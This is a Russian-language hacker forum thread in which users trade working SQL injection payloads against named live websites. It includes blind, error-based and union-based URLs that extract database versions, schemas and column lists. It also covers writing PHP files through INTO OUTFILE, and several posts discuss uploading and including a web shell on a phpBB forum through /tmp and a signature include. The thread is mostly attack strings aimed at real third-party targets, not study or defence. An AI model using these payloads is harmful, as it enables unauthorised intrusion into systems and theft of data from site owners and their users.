что делать? открыть учебник по кодингу, и курить очень долго =\ http://www.php.su/functions/?htmlspecialchars
Такой вопросец, немогу чёт понять как разкрутить ету слепую скулю так вроде норм PHP: http://board.ugmk.info/?type=(substring(@@version,1,1)=5) а так ошибка PHP: http://board.ugmk.info/?type=(ascii(substring(select+table_schema+from+information_schema.tables+limit+0,1),1,1)>0) чё ему там не нравится?
to qaz Зачем слепая? Все отлично выводится! Выберайте как Вам удобнее... Code: http://board.ugmk.info/?b=1337350801+or+1+group+by+mid(version(),floor(rand(0)*2),64)+having+avg(0)--+or+1 Code: http://board.ugmk.info/?b=1337350801+and+extractvalue(1,concat(0x3a,version()))--+
http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=post_subject&start=1390,1--+ - TRUE => скуля в LIMIT'e. Такие скули можно раскрутить только если в запросе не присутствует order by. В данной скуле Order by уже есть, т.ч. нет. Или если у юзера есть file_priv то через такую скулю можно залиться: limit=10,1 limit 1 into outfile '/path/filename.php' lines terminated by 'olololo'-- a Но в другом параметре (sortme) можно скулю раскрутить через ErrorBased. Там скуля в параметре order by. http://www.ximicat.com/index.php?search=Na&razdel_poiska=forum&sortme=post_subject,(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+ Duplicate entry '5.1.61-0+squeeze1-log1' for key 'group_key' //offtop я хотел чтобы человек подумал хоть, а ты...(
http://dnzl.ru/view_post.php?id=80%27+and+1=0+union%0Aselect+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables--+
to shadowrun Наглядный пример того, что все там видно! Code: http://dnzl.ru/view_post.php?id=80'+and+1=0+union%0Aselect+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6,7,8,9,10,11,12,13,14,15--+
Ну или так постом id=80'and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1='1
как таблицы вывести тут? http://www.yarmarka-vacancy.ru/index.php?id=-4+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%0afrom+information_schema.tables+--+&option=com_tpjobs&page=3&task=searchbyloc
Пытаюсь загрузить шелл на форум через админку (форум phpbb 2.0.21). Делаю это вот так: Восстанавливаю через бд этот файл и мне пишет: Это значит нет прав на запись ? (хотя если указать путь /tmp, то ошибок нет) Пробывал вот таким вариантом: phpinfo() выводит, а вот как загрузить шелл ? Я пытался примерно так: . Но увы, так не работает (
bodrich Может стоить хоть немного мат часть изучить? 1. wget'a возможно нету, или нету прав на диру. 2. Шелл можно загрузить в /tmp а потом его проинклюдить (user_sig='phpbb:include("/tmp/shell.bmp")') =\
cat1vo, спасибо, но не помогло. Это я понял, просто спрашивал, что быть 100% увереным. Пробывал уже, не получается (
